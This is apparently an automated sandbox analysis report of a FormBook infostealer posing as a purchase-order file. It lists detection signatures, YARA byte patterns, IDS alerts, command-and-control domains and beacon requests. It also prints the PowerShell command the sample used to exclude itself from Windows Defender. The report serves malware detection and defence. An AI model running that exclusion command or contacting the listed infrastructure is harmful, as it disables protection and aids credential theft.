
Windows Analysis Report
PO Copy_7854569.exe

Overview

General Information

Sample name:PO Copy_7854569.exe
Analysis ID:1446507
MD5:1a446464ce98784973a5e7bd13190a5b
SHA1:d4a5f07d3259338ec8ac7c84dc387dd0ea581b6b
SHA256:dcda4d5b1eba2327c178aad5f4237e22934841cd6d7ad116c2cb1622d6e9673b
Tags:exe, Formbook

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PO Copy_7854569.exe (PID: 3648 cmdline: "C:\Users\user\Desktop\PO Copy_7854569.exe" MD5: 1A446464CE98784973A5E7BD13190A5B)
    • powershell.exe (PID: 4220 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PO Copy_7854569.exe (PID: 3560 cmdline: "C:\Users\user\Desktop\PO Copy_7854569.exe" MD5: 1A446464CE98784973A5E7BD13190A5B)
    • PO Copy_7854569.exe (PID: 1088 cmdline: "C:\Users\user\Desktop\PO Copy_7854569.exe" MD5: 1A446464CE98784973A5E7BD13190A5B)
      • sXAKgqpSAiGEzhyDsUSKBxPWz.exe (PID: 7128 cmdline: "C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • openfiles.exe (PID: 4432 cmdline: "C:\Windows\SysWOW64\openfiles.exe" MD5: 50BD10A4C573E609A401114488299D3D)
          • sXAKgqpSAiGEzhyDsUSKBxPWz.exe (PID: 7116 cmdline: "C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5756 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000008.00000002.4439108659.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.4439108659.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a540:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13b1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.4440623367.00000000045A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.4440623367.00000000045A0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a540:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13b1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
6.2.PO Copy_7854569.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
6.2.PO Copy_7854569.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2d953:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16f32:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
6.2.PO Copy_7854569.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
6.2.PO Copy_7854569.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2cb53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16132:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO Copy_7854569.exe", ParentImage: C:\Users\user\Desktop\PO Copy_7854569.exe, ParentProcessId: 3648, ParentProcessName: PO Copy_7854569.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe", ProcessId: 4220, ProcessName: powershell.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO Copy_7854569.exe", ParentImage: C:\Users\user\Desktop\PO Copy_7854569.exe, ParentProcessId: 3648, ParentProcessName: PO Copy_7854569.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe", ProcessId: 4220, ProcessName: powershell.exe
            Timestamp:05/23/24-15:17:32.170290
            SID:2855465
            Source Port:53661
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:16:50.015697
            SID:2855465
            Source Port:53652
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:17:18.761145
            SID:2855465
            Source Port:53657
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:17:46.447712
            SID:2855465
            Source Port:53665
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:17:10.469533
            SID:2856318
            Source Port:53654
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            AV Detection

            Source: PO Copy_7854569.exeAvira: detected
            Source: http://www.xn--bb55rtp-9va2p.store/a42m/?R0nl4=f64p&vH5=SpRmwiWWWie0LiCX9EyQXvy6lxMcCKfTuTRukl4i+K/mOSJ9++mgtoeJyEwnF13dco3p6AsQh3ikhhdZe62TUGOhYKvcqIkBTBlrJzQRtlxjx1oX6jajL6xfb2K92Bka0g==Avira URL Cloud: Label: malware
            Source: http://www.ratulunabet78.xyz/a42m/Avira URL Cloud: Label: malware
            Source: http://www.ratulunabet78.xyzAvira URL Cloud: Label: malware
            Source: http://www.xn--bb55rtp-9va2p.store/a42m/Avira URL Cloud: Label: malware
            Source: http://www.ratulunabet78.xyz/a42m/?vH5=98dQgeI97PpkPBwDNVDdt2fIP/8t+dN1kUHbH7cCS7ph4DK0k1WK4KE3/58PmNJa+S2FnMy9XFHjKVdPS0wRAwevARZLL3+cVCGRrbGhBpDtYSzj3TCwpxccczld+77x/A==&R0nl4=f64pAvira URL Cloud: Label: malware
            Source: PO Copy_7854569.exeVirustotal: Detection: 45%
            Source: PO Copy_7854569.exeReversingLabs: Detection: 68%
            Source: Yara matchFile source: 6.2.PO Copy_7854569.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.PO Copy_7854569.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4439108659.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4440623367.00000000045A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2120310446.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4442575534.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2122191823.0000000002E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: PO Copy_7854569.exeJoe Sandbox ML: detected
            Source: PO Copy_7854569.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: PO Copy_7854569.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: OpnFiles.pdb source: PO Copy_7854569.exe, 00000006.00000002.2120087862.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000003.2528143516.000000000069B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000002.4439886342.0000000000AEE000.00000002.00000001.01000000.0000000C.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000000.2205683578.0000000000AEE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO Copy_7854569.exe, 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000008.00000003.2141673668.000000000469F000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000008.00000003.2120507310.00000000044EB000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO Copy_7854569.exe, PO Copy_7854569.exe, 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, openfiles.exe, 00000008.00000003.2141673668.000000000469F000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000008.00000003.2120507310.00000000044EB000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: OpnFiles.pdbGCTL source: PO Copy_7854569.exe, 00000006.00000002.2120087862.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000003.2528143516.000000000069B000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0282B880 FindFirstFileW,FindNextFileW,FindClose,8_2_0282B880
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 4x nop then jmp 076EAAC2h0_2_076EAA76
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 4x nop then xor eax, eax8_2_028194B0

            Networking

            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:53652 -> 103.247.10.164:80
            Source: TrafficSnort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.5:53654 -> 162.240.81.18:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:53657 -> 162.240.81.18:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:53661 -> 162.0.237.22:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:53665 -> 84.32.84.32:80
            Source: DNS query: www.crimsoncascade.xyz
            Source: DNS query: www.ratulunabet78.xyz
            Source: Joe Sandbox ViewIP Address: 162.240.81.18 162.240.81.18
            Source: Joe Sandbox ViewIP Address: 162.0.237.22 162.0.237.22
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: RUMAHWEB-AS-IDRumahwebIndonesiaCVID RUMAHWEB-AS-IDRumahwebIndonesiaCVID
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /a42m/?R0nl4=f64p&vH5=6CH/YRMAK7aydmoZX4rE3aHTO96gtIC3593I/qH1Euv5gdtO1aVIaIsEnNz/XwGPewRjk6ONG4Ys+seqd2cELhY1N+SfeluTEbHos+Hkwv+a06EBMG8yJcZA+l8yWcOKFg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.gregoriusalvin.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a42m/?R0nl4=f64p&vH5=BaBbynwG2FaMiw+m+oe/pVgQl9HtQpBnPsDfKOVNrs70A5vduIAG3AN1jPdCIStIA9EjWNWwwUOGmupZW6v0AZj8SPVeonrFiOinbxCwnOWiWMOKy28ccO1L5nk/mSSCeg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.tintasmaiscor.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a42m/?vH5=OaCxij+az8CWZkVSgZ9BvYP+nrAHPzHJsZdPmSHU0RFVoK/pLfrBJ2MjeSz+pAxrgiF9enqzkwmMWhrDz0ZQ4sIJ7tOHf1xt78d5/aV4E0eta/TI3w61kMO4VihKAD9uew==&R0nl4=f64p HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.crimsoncascade.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a42m/?R0nl4=f64p&vH5=SpRmwiWWWie0LiCX9EyQXvy6lxMcCKfTuTRukl4i+K/mOSJ9++mgtoeJyEwnF13dco3p6AsQh3ikhhdZe62TUGOhYKvcqIkBTBlrJzQRtlxjx1oX6jajL6xfb2K92Bka0g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.xn--bb55rtp-9va2p.storeConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a42m/?vH5=TRa47sC0zg9DwlJApIa9TKXT0LmdSyPROaHr8XI2UWJs85O5KJ5vgIdD5G7YtksjxwnhYTkQf9KJFjTFonbd3AHZxsuWNHNjjLjlx6sM8JLXfuIwaQjmht/eByOeQ7cAZg==&R0nl4=f64p HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.fidyart.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a42m/?R0nl4=f64p&vH5=q82ug4hJ4iMW1QeZ+GCgoJbZS3jVtW+Vvu2ntYvjkNah5D8fKd1XYREKBHF28ngiXJtWR4/9FoDVe0EJ2zKZXh/HzsdFhnk2W05Rc4EGYuWHBokuuF9nEMUprlqBVZ4vog== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.leaflearn.storeConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a42m/?vH5=vQQIiwhFgpVoGnhhtc2P1VILfyaWtEv7qbiLczs1d6+poiTW6QrgALxDe+CMs+NuEeSHyk/V30WhMaxjncGhKZCgCMKVtFum7SXMM5CUlA+qFcg/x36UpY0MC+LaLW6wHA==&R0nl4=f64p HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.p65cq675did.shopConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a42m/?R0nl4=f64p&vH5=R4g0iLEn+5Q22eej6WVWFlCYkAtUsHnBzM8NBDsaFSaCgPmb2Z+2OZ+xqOKmenmNERVCqFgQJgmiG9oBky2gZW66+VsZINZo3qt/OX5zYEd5gmWOXPMaopeVLu+bZcefww== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.digitoxmarketing.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a42m/?R0nl4=f64p&vH5=nLiHY6ZlzAe25GxlmAxaMXLPD/QIkKTmL2k396ng4hoKCGGx5/R6Lgv+VE3CAus50oYKw0M+CtaS1Cqyitq9Qy6dvHCDxXkEGnRvDu59ECZqrIMOmhT00aeob0V7fCoJ5Q== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.6whebx.cyouConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a42m/?vH5=98dQgeI97PpkPBwDNVDdt2fIP/8t+dN1kUHbH7cCS7ph4DK0k1WK4KE3/58PmNJa+S2FnMy9XFHjKVdPS0wRAwevARZLL3+cVCGRrbGhBpDtYSzj3TCwpxccczld+77x/A==&R0nl4=f64p HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.ratulunabet78.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.designsbysruly.com
            Source: global trafficDNS traffic detected: DNS query: www.weeveno.com
            Source: global trafficDNS traffic detected: DNS query: www.gcashservice247.com
            Source: global trafficDNS traffic detected: DNS query: www.infomail.website
            Source: global trafficDNS traffic detected: DNS query: www.gregoriusalvin.com
            Source: global trafficDNS traffic detected: DNS query: www.italiangreyhounds.online
            Source: global trafficDNS traffic detected: DNS query: www.tintasmaiscor.com
            Source: global trafficDNS traffic detected: DNS query: www.crimsoncascade.xyz
            Source: global trafficDNS traffic detected: DNS query: www.xn--bb55rtp-9va2p.store
            Source: global trafficDNS traffic detected: DNS query: www.fidyart.com
            Source: global trafficDNS traffic detected: DNS query: www.leaflearn.store
            Source: global trafficDNS traffic detected: DNS query: www.p65cq675did.shop
            Source: global trafficDNS traffic detected: DNS query: www.digitoxmarketing.com
            Source: global trafficDNS traffic detected: DNS query: www.transformthedorm.com
            Source: global trafficDNS traffic detected: DNS query: www.6whebx.cyou
            Source: global trafficDNS traffic detected: DNS query: www.ratulunabet78.xyz
            Source: unknownHTTP traffic detected: POST /a42m/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.tintasmaiscor.comOrigin: http://www.tintasmaiscor.comContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 204Connection: closeReferer: http://www.tintasmaiscor.com/a42m/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Thu, 23 May 2024 13:16:51 GMTserver: LiteSpeed
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 23 May 2024 13:17:11 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Thu, 23 May 2024 13:17:13 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "636d2d22-e42"
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Thu, 23 May 2024 13:17:16 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "636d2d22-e42"
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Thu, 23 May 2024 13:17:19 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "636d2d22-e42"
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 13:17:24 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 13:17:27 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 13:17:29 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 13:17:32 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html date: Thu, 23 May 2024 13:17:52 GMT transfer-encoding: chunked connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html date: Thu, 23 May 2024 13:17:55 GMT transfer-encoding: chunked connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html date: Thu, 23 May 2024 13:17:57 GMT transfer-encoding: chunked connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html date: Thu, 23 May 2024 13:18:00 GMT transfer-encoding: chunked connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.4.33 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: pbid=63ca0da697d2750f9c5521ccdb3312356640a39c55160d7b7c02c575c995ccab; expires=Tue, 19-Nov-2024 13:18:57 GMT; Max-Age=15552000; path=/ link: <https://digitoxmarketing.com/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Thu, 23 May 2024 13:18:57 GMT server: LiteSpeed
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: pbid=a7abf01be0dad0e110c65e58536e3ca658c8283c8d5bcb8df9add79ef8f791ea; expires=Tue, 19-Nov-2024 13:19:00 GMT; Max-Age=15552000; path=/link: <https://digitoxmarketing.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 23 May 2024 13:19:00 GMTserver: LiteSpeed
